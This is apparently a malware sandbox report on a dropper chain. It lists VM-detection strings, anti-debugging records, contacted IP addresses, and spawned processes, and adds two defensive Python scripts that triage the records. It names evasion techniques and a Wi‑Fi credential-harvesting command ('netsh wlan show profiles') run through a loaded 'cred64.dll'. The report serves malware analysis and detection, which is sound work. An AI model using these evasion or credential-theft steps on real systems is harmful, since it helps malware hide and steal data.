Source: explorha.exe, explorha.exe, 00000006.00000002.2910760294.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000000.2298675469.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp, 590971cd60.exe, 00000014.00000002.2887101333.0000000000E52000.00000040.00000001.01000000.00000014.sdmp, explorha.exe, 00000024.00000000.2531196988.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, MPGPH131.exe, 00000026.00000002.2747934122.0000000000902000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: MPGPH131.exe, 00000026.00000003.2572826280.00000000013EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: amert.exe, 0000000C.00000003.2401877361.00000000014EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uQ0C\
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000JUy0
Source: 590971cd60.exe, 00000014.00000002.2895159707.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _vmware
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7214000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.000000000066D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.0000000000699000.00000004.00000020.00020000.00000000.sdmp, chrosha.exe, 00000010.00000002.2907399446.000000000104B000.00000004.00000020.00020000.00000000.sdmp, chrosha.exe, 00000010.00000002.2907399446.0000000001001000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2910577091.0000019EC9C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2921881125.0000019ECF258000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bad48ea9ac.exe, 0000000F.00000003.2687671932.0000000003E47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MPGPH131.exe, 00000026.00000003.2572826280.00000000013ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 590971cd60.exe, 00000014.00000002.2895159707.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \?\scsi_vmwaretual_dif219&0&3f563070-94f2-b8b}t
Source: netsh.exe, 00000009.00000003.2363267427.0000022A82527000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Z@
Source: netsh.exe, 00000018.00000003.2496911308.00000203057B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_3DC1DCF1
Source: 590971cd60.exe, 00000014.00000003.2630675144.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i#disk&ven_vmware&pro
Source: 590971cd60.exe, 00000014.00000003.2596974102.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
Source: bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
Source: rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Ey0
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>'
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: UeW2b6mU6Z.exe, 00000000.00000002.1671998691.0000000000E40000.00000040.00000001.01000000.00000003.sdmp, UeW2b6mU6Z.exe, 00000000.00000000.1624553446.0000000000E40000.00000080.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1703565671.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000001.00000000.1654835716.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, explorha.exe, 00000002.00000000.1662078999.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, explorha.exe, 00000002.00000002.1711422496.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000002.2910760294.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000000.2298675469.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp, 590971cd60.exe, 00000014.00000002.2887101333.0000000000E52000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J6HEdjEHUub5EtqTQ2dk3wwrCNfruTWZeEqONRrqgXAW0ke6pZXg==_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process information queried: ProcessInformation
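
The evasion observations above are raw sandbox lines, one per intercepted API event, so each process appears dozens of times and weak and strong evidence sit side by side. The script below is an added triage helper, not part of this report or of any sandbox product. It parses lines of the form `Source: <process> <signature>: <details>` (dropping the "Jump to behavior" link labels the report UI appends), aggregates them per process and adds what the raw lines leave implicit: it counts the instructions between two intercepted `rdtsc` executions (the pushad/popad/jmp padding of the timing check), converts the sleep values and flags 922337203685477, which is 0x7FFFFFFFFFFFFFFF 100 ns ticks, a relative wait that never expires; and it weights the memory-string hits, since "HARDWARE\ACPI\DSDT\VBOX__" sits in image memory next to the Oreans WinLicense strings and is a hard-coded check, whereas "Hyper-V RAW" is the name of the Winsock AF_HYPERV provider that mswsock.dll registers on every current Windows build and proves nothing about the sample, and the VMware device paths are largely what the process saw when it enumerated the sandbox's own disks. The sample lines are copied from this report (including two from the anti-debugging section that follows); the category names, the evidence weights and the assumption that the sleep values are milliseconds (consistent with the 180000 "delay time" of the same explorha.exe threads) are this example's own.

```python
"""Triage helper for sandbox behaviour lines of the form
'Source: <process> <signature>: <details>'.

Added example, not part of the sandbox report. SAMPLE_LINES are copied from
the report; the category names, the evidence weights and the assumption that
sleep values are milliseconds are this example's own.
"""
import re
from collections import Counter, defaultdict

# Largest positive LARGE_INTEGER (0x7FFFFFFFFFFFFFFF, in 100 ns ticks) in ms.
# A relative NtDelayExecution of this size never wakes the thread.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000          # 922337203685477

# The report compares sleeps against a 30000 ms bar ("... >= -30000s").
LONG_SLEEP_MS = 30_000

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420904 second address: 542090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bh 0x00000006 popad 0x00000007 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B3EC6E instructions caused by: Self-modifying code",
    r"Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6808 Thread sleep time: -62031s >= -30000s Jump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0",
    r"Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SICE",
    r"Source: netsh.exe, 00000009.00000003.2363267427.0000022A82527000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r"Source: explorha.exe, 00000006.00000002.2910760294.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
]

LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+?),?\s+(?P<rest>.*?)"
    r"(?:\s+Jump to (?:behavior|dropped file))?$"
)

# Ordered (pattern, category): the first match wins.
RULES = [
    (r"RDTSC instruction interceptor|\brdtsc\b", "timing-check"),
    (r"Special instruction interceptor", "self-modifying-code"),
    (r"Registry key queried:.*\b(SystemBiosVersion|VideoBiosVersion|DriverDesc)\b", "vm-check-registry"),
    (r"Binary or memory string:", "vm-string"),
    (r"HideFromDebugger|Process queried: DebugPort", "anti-debug"),
    (r"File opened: (NTICE|SICE|SIWVID)$", "anti-debug"),      # SoftICE device names
    (r"Open window title or class name:", "tool-detection"),
    (r"Thread sleep|Thread delayed|threadDelayed", "sleep-evasion"),
    (r"File opened: PhysicalDrive", "disk-probe"),
    (r"Dropped PE file which has not been started", "dropped-not-run"),
]

# Strings the sandbox matched in memory, and how much each actually proves.
VM_MARKERS = {
    "VBOX__": ("VirtualBox ACPI DSDT table name, hard-coded in the packer stub", "strong"),
    "vmware": ("VMware device identifier, usually from enumerating the host's disks", "medium"),
    "Hyper-V RAW": ("Winsock AF_HYPERV provider name from mswsock.dll", "weak"),
}

SLEEP_RE = re.compile(r"(?:sleep time|delay time):\s*-?(\d+)")
INSN_RE = re.compile(r"0x[0-9A-Fa-f]{8}\s+([a-z]+)")


def parse_line(line):
    """Return a dict describing one report line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc, rest = m.group("proc"), m.group("rest")
    rec = {"proc": proc.rsplit("\\", 1)[-1], "category": "other", "text": rest}
    for pattern, category in RULES:
        if re.search(pattern, rest):
            rec["category"] = category
            break
    if rec["category"] == "timing-check" and "instructions:" in rest:
        # Instructions executed between the two intercepted rdtsc reads.
        mnemonics = INSN_RE.findall(rest.split("instructions:", 1)[1])
        rec["instructions"] = len(mnemonics)
        rec["branches"] = sum(mn.startswith("j") for mn in mnemonics)
    elif rec["category"] == "sleep-evasion":
        sm = SLEEP_RE.search(rest)
        if sm:
            ms = int(sm.group(1))               # assumed to be milliseconds
            rec["sleep_ms"] = ms
            rec["long_sleep"] = ms >= LONG_SLEEP_MS
            rec["infinite"] = ms >= INFINITE_WAIT_MS
    elif rec["category"] == "vm-string":
        for marker, (meaning, weight) in VM_MARKERS.items():
            if marker.lower() in rest.lower():
                rec.update(marker=marker, meaning=meaning, weight=weight)
                break
    return rec


def summarize(lines):
    """Per-process category counts plus the observations worth a second look."""
    counts = defaultdict(Counter)
    notable = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        counts[rec["proc"]][rec["category"]] += 1
        softice = rec["category"] == "anti-debug" and "File opened" in rec["text"]
        if rec.get("infinite") or rec.get("weight") == "strong" or softice:
            notable.append(rec)
    return counts, notable


if __name__ == "__main__":
    counts, notable = summarize(SAMPLE_LINES)
    for proc, c in sorted(counts.items()):
        print(f"{proc:20} {dict(c)}")
    for rec in notable:
        print("NOTABLE:", rec["proc"], rec["category"], rec["text"][:70])
```

Feed it the whole report (one line per entry) and the per-process table separates the Oreans-packed droppers (timing checks, self-modifying code, HideFromDebugger, DebugPort) from the processes that merely slept or enumerated hardware, which is the split that matters when deciding what to detonate under a debugger next.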

Anti Debugging

Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_054708F6 Start: 05470966 End: 05470948 0_2_054708F6
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SIWVID
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_05470C1D rdtsc 0_2_05470C1D
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0E110 LdrInitializeThunk,_strrchr,__alldvrm,__alldvrm,__alldvrm, 6_2_00B0E110
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C77BBB mov eax, dword ptr fs:[00000030h] 0_2_00C77BBB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C7B922 mov eax, dword ptr fs:[00000030h] 0_2_00C7B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B0B922 mov eax, dword ptr fs:[00000030h] 1_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B07BBB mov eax, dword ptr fs:[00000030h] 1_2_00B07BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B0B922 mov eax, dword ptr fs:[00000030h] 2_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B07BBB mov eax, dword ptr fs:[00000030h] 2_2_00B07BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0B922 mov eax, dword ptr fs:[00000030h] 6_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B07BBB mov eax, dword ptr fs:[00000030h] 6_2_00B07BBB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
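The records above describe anti-analysis behaviour at the sandbox's event level rather than at the API level. The following is an added example, not part of this report and not code from the sandbox vendor, that parses records in that shape and maps each one to the technique it corresponds to: HideFromDebugger to NtSetInformationThread(ThreadHideFromDebugger), DebugPort to NtQueryInformationProcess(ProcessDebugPort), the window names to FindWindow probes for OllyDbg and the Sysinternals monitors, NTICE/SICE/SIWVID to SoftICE device-name probes, rdtsc to timing checks, and fs:[30h] reads to PEB access. The sample lines are constructed from the section above; the tag names, the "strong" tag set and the triage threshold are assumptions of the example, and the API mapping is the standard reading of each record, not something the report itself states.

```python
import re
from collections import defaultdict

# Constructed sample: a few records copied from the anti-debugging section of the
# report (a subset, not the full list), in the shape "Source: <path> <event>: <detail>".
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SICE
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_05470C1D rdtsc 0_2_05470C1D
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C77BBB mov eax, dword ptr fs:[00000030h] 0_2_00C77BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0E110 LdrInitializeThunk,_strrchr,__alldvrm,__alldvrm,__alldvrm, 6_2_00B0E110
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
"""

# Process paths may contain spaces, so the event name is matched from a fixed list.
# "Jump to behavior" is link residue from the interactive report and is dropped.
EVENTS = ("Thread information set", "Open window title or class name", "File opened",
          "Process queried", "Code function", "Process token adjusted")
RECORD = re.compile(r"^Source: (?P<src>.+?) (?P<event>" + "|".join(re.escape(e) for e in EVENTS)
                    + r"): (?P<detail>.+?)(?: Jump to behavior)?$")

# Window class/title names probed in the report, grouped by the tool they belong to.
SYSINTERNALS_WINDOWS = {
    "regmonclass", "filemonclass", "procmon_window_class",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
DEBUGGER_WINDOWS = {"ollydbg", "gbdyllo"}      # both probed by 590971cd60.exe in the report
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}  # device names of the SoftICE kernel debugger


def classify(event, detail):
    """Map one record to a technique tag (names are this example's own); comments give the API."""
    d = detail.strip().lower()
    if event == "Thread information set" and d == "hidefromdebugger":
        return "hide-thread-from-debugger"   # NtSetInformationThread(ThreadHideFromDebugger)
    if event == "Process queried" and d == "debugport":
        return "debug-port-query"            # NtQueryInformationProcess(ProcessDebugPort)
    if event == "Open window title or class name":   # FindWindow against a tool list
        if d in SYSINTERNALS_WINDOWS:
            return "tool-window-scan:sysinternals"
        return "tool-window-scan:debugger" if d in DEBUGGER_WINDOWS else "tool-window-scan:other"
    if event == "File opened" and detail.strip().upper() in SOFTICE_DEVICES:
        return "softice-device-probe"        # CreateFile on \\.\SICE, \\.\NTICE, \\.\SIWVID
    if event == "Code function":
        if "rdtsc" in d.split():
            return "rdtsc-timing"            # timing delta check around traced code
        if "fs:[00000030h]" in d:
            return "peb-access"              # TEB->PEB; which field is read is not in the record
    if event == "Process token adjusted" and d == "debug":
        return "debug-privilege"             # SeDebugPrivilege enabled; weak evidence on its own
    return None


def summarize(lines):
    """Per process image name: the set of technique tags seen for it."""
    found = defaultdict(set)
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            continue
        tag = classify(m["event"], m["detail"])
        if tag:
            found[m["src"].rsplit("\\", 1)[-1]].add(tag)
    return dict(found)


# Tags that on their own indicate deliberate anti-analysis (assumed set for this example).
STRONG = {"hide-thread-from-debugger", "softice-device-probe",
          "tool-window-scan:sysinternals", "tool-window-scan:debugger"}


def triage(summary, min_tags=2):
    """Processes with a strong tag, or at least min_tags distinct tags (threshold is an assumption)."""
    return sorted(p for p, tags in summary.items() if tags & STRONG or len(tags) >= min_tags)


if __name__ == "__main__":
    s = summarize(SAMPLE.strip().splitlines())
    for proc in triage(s):
        print(proc, sorted(s[proc]))
```

Run against the full section, the summary separates the two behaviours mixed together above: 590971cd60.exe and chrosha.exe look for analysis tooling by name (FindWindow and SoftICE device probes), while UeW2b6mU6Z.exe and explorha.exe rely on debug-port queries, rdtsc and PEB reads. The powershell.exe SeDebugPrivilege record alone does not reach the triage threshold, which is the intended reading of that line.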

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.167 80
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Message posted: Message id: QUERYENDSESSION
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
